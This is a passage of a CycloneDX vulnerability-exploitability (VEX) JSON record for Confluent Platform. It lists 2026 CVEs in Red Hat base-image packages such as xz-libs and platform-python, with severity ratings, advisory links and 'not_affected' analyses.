          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-34743",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        122
      ],
      "description": "XZ Utils provide a general-purpose data-compression library plus command-line tools. Prior to version 5.8.3, if lzma_index_decoder() was used to decode an Index that contained no Records, the resulting lzma_index was left in a state where where a subsequent lzma_index_append() would allocate too little memory, and a buffer overflow would occur. This issue has been patched in version 5.8.3.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-34743"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/31/13"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-34743"
        },
        {
          "url": "https://github.com/tukaani-project/xz/commit/c8c22869e780ff57c96b46939c3d79ff99395f87"
        },
        {
          "url": "https://github.com/tukaani-project/xz/releases/tag/v5.8.3"
        },
        {
          "url": "https://github.com/tukaani-project/xz/security/advisories/GHSA-x872-m794-cxhv"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2026/07/msg00034.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34743"
        },
        {
          "url": "https://tukaani.org/xz/index-append-overflow.html"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8362-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-34743"
        }
      ],
      "published": "2026-04-02T19:21:33+00:00",
      "updated": "2026-07-24T21:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "5.2.4-4.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/xz-libs@5.2.4-4.el8_6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3479",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        22
      ],
      "description": "DISPUTED: The project has clarified that the documentation was incorrect, and that pkgutil.get_data() has the same security model as open(). The documentation has been updated to clarify this point. There is no vulnerability in the function if following the intended security model.\n\npkgutil.get_data() did not validate the resource argument as documented, allowing path traversals.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3479"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3479"
        },
        {
          "url": "https://github.com/python/cpython/commit/5af6ce3e7b643a30a02d22245c1e3f4a8bc0a1fe"
        },
        {
          "url": "https://github.com/python/cpython/commit/bcdf231946b1da8bdfbab4c05539bb0cc964a1c7"
        },
        {
          "url": "https://github.com/python/cpython/commit/cf59bf76470f3d75ad47d80ffb8ce76b64b5e943"
        },
        {
          "url": "https://github.com/python/cpython/commit/d786d59a8f7196bb630100a869f28ad13436b59c"
        },
        {
          "url": "https://github.com/python/cpython/issues/146121"
        },
        {
          "url": "https://github.com/python/cpython/pull/146122"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/WYLLVQOOCKGK73JM7Z7ZSNOJC4N7BAWY/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3479"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3479"
        }
      ],
      "published": "2026-03-18T19:16:06+00:00",
      "updated": "2026-06-17T10:43:39+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3644",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        20,
        116
      ],
      "description": "The fix for CVE-2026-0672, which rejected control characters in http.cookies.Morsel, was incomplete. The Morsel.update(), |= operator, and unpickling paths were not patched, allowing control characters to bypass input validation. Additionally, BaseCookie.js_output() lacked the output validation applied to BaseCookie.output().",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3644"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19064"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3644"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-19064.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:19177"
        },
        {
          "url": "https://github.com/python/cpython/commit/3974092b037f9a3b000fb15b48ea61ce3b25d330"
        },
        {
          "url": "https://github.com/python/cpython/commit/556aa098e738b127c714866f819b4abe2f7593d8"
        },
        {
          "url": "https://github.com/python/cpython/commit/57e88c1cf95e1481b94ae57abe1010469d47a6b4"
        },
        {
          "url": "https://github.com/python/cpython/commit/62ceb396fcbe69da1ded3702de586f4072b590dd"
        },
        {
          "url": "https://github.com/python/cpython/commit/d16ecc6c3626f0e2cc8f08c309c83934e8a979dd"
        },
        {
          "url": "https://github.com/python/cpython/commit/dae4b1a21f8df4570e30986affd61bbe4ade4cef"
        },
        {
          "url": "https://github.com/python/cpython/issues/145599"
        },
        {
          "url": "https://github.com/python/cpython/pull/145600"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-3644.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/H6CADMBCDRFGWCMOXWUIHFJNV43GABJ7/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3644"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3644"
        }
      ],
      "published": "2026-03-16T18:16:09+00:00",
      "updated": "2026-08-13T01:16:53+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
